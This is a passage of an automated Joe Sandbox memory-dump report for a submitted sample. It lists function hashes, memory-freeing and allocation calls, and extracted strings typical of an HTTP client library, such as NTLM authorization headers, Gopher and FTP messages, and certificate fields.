                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF7E5A010B9,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E59F9733
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF7E5A010B9,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E59F973D
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF7E5A010B9,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E59F9746
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF7E5A010B9,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E59F9761
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            • Opcode ID: dca2646a6d4bee659c796f93a2f38fa2669d1fcc608c2bf197bd4bbed9a2a8d6
                                            • Instruction ID: acbb4300b2c3c4914b8d940cabfccf6a68189936316a5505b86b4b203502aa0b
                                            • Opcode Fuzzy Hash: dca2646a6d4bee659c796f93a2f38fa2669d1fcc608c2bf197bd4bbed9a2a8d6
                                            • Instruction Fuzzy Hash: 2221AB36A18A46C2DB50AF11F865A79A760FF88F95F941032DE8F83724CF38D499C711
                                            APIs
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E5A2E522,?,?,00000000,00007FF7E5A0562B,?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A2F4FC
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E5A2E522,?,?,00000000,00007FF7E5A0562B,?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A2F506
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E5A2E522,?,?,00000000,00007FF7E5A0562B,?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A2F510
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E5A2E522,?,?,00000000,00007FF7E5A0562B,?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A2F51A
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E5A2E522,?,?,00000000,00007FF7E5A0562B,?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A2F524
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E5A2E522,?,?,00000000,00007FF7E5A0562B,?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A2F52E
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E5A2E522,?,?,00000000,00007FF7E5A0562B,?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A2F538
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E5A2E522,?,?,00000000,00007FF7E5A0562B,?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A2F542
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E5A2E522,?,?,00000000,00007FF7E5A0562B,?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A2F54C
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E5A2E522,?,?,00000000,00007FF7E5A0562B,?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A2F556
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E5A2E522,?,?,00000000,00007FF7E5A0562B,?,?,00000000,00007FF7E5A01073,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E5A2F560
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            • Opcode ID: 4bd9b4a64c6f4928f2aeb53d54435eee89f370362724c80c36f7871448125e9d
                                            • Instruction ID: c0991874306836f41906aeae9c15e2107ec9ebf9ecf6375db5da202d4705426e
                                            • Opcode Fuzzy Hash: 4bd9b4a64c6f4928f2aeb53d54435eee89f370362724c80c36f7871448125e9d
                                            • Instruction Fuzzy Hash: B201B526B1490AC2D714AF26FC669386730FF88F59BA41032CE4F86224DE38D899C351
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: mallocmemcpy
                                            • String ID: %%25%s]$%ld$%s://%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$file$file://%s%s%s$https
                                            • API String ID: 4276657696-1832275178
                                            • Opcode ID: 69b0ccfb545972a865a62a18da8bb8aafa5613a807871fdf383be4992c4471e4
                                            • Instruction ID: de78c76c6a7c34ee9fc31a42f620308645ba55ad366d653f0bfcc0511f7beba1
                                            • Opcode Fuzzy Hash: 69b0ccfb545972a865a62a18da8bb8aafa5613a807871fdf383be4992c4471e4
                                            • Instruction Fuzzy Hash: 95A16E65709B8A85EA65AB11E421BB9BBA0FF44F84F844137CE4D93798DF3CE484C721
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: memcpy$freemalloc
                                            • String ID: 8$Excessive server response line length received, %zd bytes. Stripping$cached response data too big to handle$response reading failed
                                            • API String ID: 3313557100-1003742340
                                            • Opcode ID: ac4d52a539b15f27428fc5d89cc48acd8341c1d8d3da493b39954d9423c2a7b7
                                            • Instruction ID: 654358e3685c31c9f5563dcf79d6d4de87f76905a650f10f1976cae3a8fc4bbc
                                            • Opcode Fuzzy Hash: ac4d52a539b15f27428fc5d89cc48acd8341c1d8d3da493b39954d9423c2a7b7
                                            • Instruction Fuzzy Hash: 94819122708B9982DA54AF26D464BAEABA0FF45F88F844437DE4E87741DF3CD4A1C351
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$mallocmemcpy
                                            • String ID: Serial Number: %s$ Signature Algorithm: %s$Serial Number$Signature Algorithm
                                            • API String ID: 3401966785-517259162
                                            • Opcode ID: 54122bf5e3d3342fd2a96bae5bdd9d8b9827785846c702c0f1603b4f91230c77
                                            • Instruction ID: d743fce3f809fb1f490433ee91c1070cb7ec2a1710df42a83977567149107357
                                            • Opcode Fuzzy Hash: 54122bf5e3d3342fd2a96bae5bdd9d8b9827785846c702c0f1603b4f91230c77
                                            • Instruction Fuzzy Hash: E6610851B0979A45EB18A7658434BBDAF91AF05FC8FC44537CA0F87785DE3CA1488322
                                            APIs
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,?,00000000,?,NTLM,?,00007FF7E5A144E8), ref: 00007FF7E5A31010
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,?,00000000,?,NTLM,?,00007FF7E5A144E8), ref: 00007FF7E5A31047
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,?,00000000,?,NTLM,?,00007FF7E5A144E8), ref: 00007FF7E5A3106E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID: %sAuthorization: NTLM %s$HTTP$NTLM$Proxy-
                                            • API String ID: 1294909896-3948863929
                                            • Opcode ID: 33b6c4fc7c206a8ba251b097363a5618546007abb926c668e6bcb56dbfa46066
                                            • Instruction ID: cb338e5f41e5b97095b918330dfa8233732a1ebf3084c014d7bd3e3e4c3fb4f7
                                            • Opcode Fuzzy Hash: 33b6c4fc7c206a8ba251b097363a5618546007abb926c668e6bcb56dbfa46066
                                            • Instruction Fuzzy Hash: 1B614B32B08B8A85E760AF15E854BAABBA5FB44F88F900037DA4D87754DF3CD545C712
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: malloc$Ioctlsetsockopt
                                            • String ID: Failed to alloc scratch buffer!$We are completely uploaded and fine
                                            • API String ID: 3352517165-607151321
                                            • Opcode ID: ee81accd4b847cd42e6af56fc2334136a251d3c0f8ce0672d0cf2a3ae3100591
                                            • Instruction ID: 660357b285b6075f46ef4787416f7053a45b6b2eae9488afad32a639dc6e4e2f
                                            • Opcode Fuzzy Hash: ee81accd4b847cd42e6af56fc2334136a251d3c0f8ce0672d0cf2a3ae3100591
                                            • Instruction Fuzzy Hash: C4B17333B18A8A85EB65AF34D0647F9AB90EF44F5CF480136CF4D8A785DF3894958721
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$_strdupmalloc
                                            • String ID: %s?%s$Failed sending Gopher request
                                            • API String ID: 111713529-132698833
                                            • Opcode ID: 81f371cc6c3db1ce7e6c04f2230a01a77cff2dda73c20b072d1ffa1f43af017b
                                            • Instruction ID: 5a7ab6cf84da719fe6a590f49e0add8cae0d84a9ead47ec2933cd050f2ffb278
                                            • Opcode Fuzzy Hash: 81f371cc6c3db1ce7e6c04f2230a01a77cff2dda73c20b072d1ffa1f43af017b
                                            • Instruction Fuzzy Hash: 1251C825B0CA4682E610AB65A821BBAEB90FF44FE4F940233DE5D937D5DE3CD4428716
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: freeisupper$mallocmemcpy
                                            • String ID: TRUE
                                            • API String ID: 3511497317-3412697401
                                            • Opcode ID: b52c7bb7d1c7cac77b7c8d046bf2007316f3759b90af48cd7ee6a67ced8cd261
                                            • Instruction ID: aa774907117772d2dc0b12639154f01297be8fc66784db31cab87583988a97d0
                                            • Opcode Fuzzy Hash: b52c7bb7d1c7cac77b7c8d046bf2007316f3759b90af48cd7ee6a67ced8cd261
                                            • Instruction Fuzzy Hash: 70512711F0D29A49FB2AAE254134B7CAF92EF55F94F844237C6AF826D5DE3C9045C322
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_destroy
                                            • String ID: value
                                            • API String ID: 1346393832-494360628
                                            • Opcode ID: 595543e97e4f44316877afba9dfb2750bd3319d5226b2b7634a77da9004cd7a0
                                            • Instruction ID: 1f258c63218b7e47b7d7a54e00c92a68727cb6bc6a4f83734cdefb747e1fb95b
                                            • Opcode Fuzzy Hash: 595543e97e4f44316877afba9dfb2750bd3319d5226b2b7634a77da9004cd7a0
                                            • Instruction Fuzzy Hash: C561C432B18A8985EB10EB74E4553EDA761EF45BA4F505332DA6C86AE9DF3CD081C311
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: freemalloc$_strdupstrtol
                                            • String ID: %%%02x
                                            • API String ID: 2999891020-4020994737
                                            • Opcode ID: 0729c3e4434bc5675d099d01015e06993560b35443a2945d2449c0f814ce84fd
                                            • Instruction ID: 2e1c8aeeb927d244d55c793e29eb3e941141f6003ab16d8b84ef2774bc5b7f2c
                                            • Opcode Fuzzy Hash: 0729c3e4434bc5675d099d01015e06993560b35443a2945d2449c0f814ce84fd
                                            • Instruction Fuzzy Hash: 2451E416B0D28A45FB22A711A032B79AF919F46F50F880137DA9E977C1EE3DE444C323
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$malloc$_strdup
                                            • String ID: %%%02x
                                            • API String ID: 1496848336-4020994737
                                            • Opcode ID: a8f65ed0a19ceec9d11366574aeb1cfd595ab54779fa0fea19c01c3edba6243c
                                            • Instruction ID: 54c22fc05277c24a23dfe8ef18b53bbcb07119c41ae236ebd38f7c83a49de11b
                                            • Opcode Fuzzy Hash: a8f65ed0a19ceec9d11366574aeb1cfd595ab54779fa0fea19c01c3edba6243c
                                            • Instruction Fuzzy Hash: 0C41D715B0D68A45FA22A711A036B79AFD19F06F50F880177DA9E967C1EE3DE4448323
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: ErrorLasthtonssend
                                            • String ID: Sending data failed (%d)
                                            • API String ID: 2027122571-2319402659
                                            • Opcode ID: befb03195a2148d1b1ff0ac0ac481479d5c72445e3b291bc39e30fad092fb3ed
                                            • Instruction ID: bb71120520f9cc354ccb50d99515db5a12a7a5dcf49e3cf3d492f442ae2423c2
                                            • Opcode Fuzzy Hash: befb03195a2148d1b1ff0ac0ac481479d5c72445e3b291bc39e30fad092fb3ed
                                            • Instruction Fuzzy Hash: ED41AE36708A8A85E7006F75D420EA8BB20FB54F89F848533DB8983754DFBCD006C322
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$_strdupmalloc
                                            • String ID: Expire Date: %s$ Public Key Algorithm: %s$Expire Date$Public Key Algorithm
                                            • API String ID: 111713529-2901970132
                                            • Opcode ID: af7acaef84084e0d3a6a94bc248c2c0a1cef4ae4d46cb6da752fa977f64bedcd
                                            • Instruction ID: a3fd35e498f8c334dc213264e194d0caadf86b95815a49a5a796cb0b2b23feee
                                            • Opcode Fuzzy Hash: af7acaef84084e0d3a6a94bc248c2c0a1cef4ae4d46cb6da752fa977f64bedcd
                                            • Instruction Fuzzy Hash: 4D315261B0978A45EB11AB61D464AFDABA1BF05F8CFC40837CE4E97356DF3CA1448322
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID: Expire Date: %s$ Public Key Algorithm: %s$ GMT$%.4s-%.2s-%.2s %.2s:%.2s:%c%c%s%.*s%s%.*s$Expire Date$Public Key Algorithm
                                            • API String ID: 1294909896-3805148269
                                            • Opcode ID: c6ae9fa0a038b8fac058063dacbcb7526f06a8394d406d1e43624cac3139f064
                                            • Instruction ID: a2560b9381f5639b8b6887ed991125a8e0194597d1e4da66e0204e899d01e9a7
                                            • Opcode Fuzzy Hash: c6ae9fa0a038b8fac058063dacbcb7526f06a8394d406d1e43624cac3139f064
                                            • Instruction Fuzzy Hash: CE71A061B0969A84EB10AB61D424AFDEFA5BF05B88FC44437CA8D87755DF3CE644C322
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID: Expire Date: %s$ Public Key Algorithm: %s$%u%.2s-%.2s-%.2s %.2s:%.2s:%.2s %.*s$Expire Date$GMT$Public Key Algorithm
                                            • API String ID: 1294909896-1642401773
                                            • Opcode ID: 59f460ac5380dd79f6a867ac5ef20a454ae35efbab770c3c74f0f6e64463f9e0
                                            • Instruction ID: 82eb506301c77594ef343733f0ef2e049bb2a5ffabaadd4c0ed9b67948eb0843
                                            • Opcode Fuzzy Hash: 59f460ac5380dd79f6a867ac5ef20a454ae35efbab770c3c74f0f6e64463f9e0
                                            • Instruction Fuzzy Hash: 17512D61B0978A84EB10AB61D464AFDEFA5BF05F88FC44436CA4D97356DF3CE6448322
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _strdup
                                            • String ID:
                                            • API String ID: 1169197092-0
                                            • Opcode ID: 47633c79588f7ee5fbe3b141cbb66ca3a80cc9efcd521e0df166b97a8c85c563
                                            • Instruction ID: 94a6c1d7626ad4c67ef0436f7126009828c0c708fd6fa1bf3c0fab0675d8f4ce
                                            • Opcode Fuzzy Hash: 47633c79588f7ee5fbe3b141cbb66ca3a80cc9efcd521e0df166b97a8c85c563
                                            • Instruction Fuzzy Hash: 7F517F22B1AB4182EB95CF65F050678B7A4FF48F84B581136EF4D43B49EF38D5A18721
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$malloc
                                            • String ID: Entry path is '%s'$Failed to figure out path$SYST
                                            • API String ID: 2190258309-1780565354
                                            • Opcode ID: 1cc48e0c41870337beabcd0a033c8b29a8aea442c7c760e77b31f6e6c80b91b2
                                            • Instruction ID: e490efc41cde53e6a1249dda19bfcdb5f5f42cce75f145cea58817d59024a3f6
                                            • Opcode Fuzzy Hash: 1cc48e0c41870337beabcd0a033c8b29a8aea442c7c760e77b31f6e6c80b91b2
                                            • Instruction Fuzzy Hash: 8841B765B086DA81E720BF25A461BB8AF90FF08F54F904033CE8E97655EE7CD045D321
                                            APIs
                                            Memory Dump Source
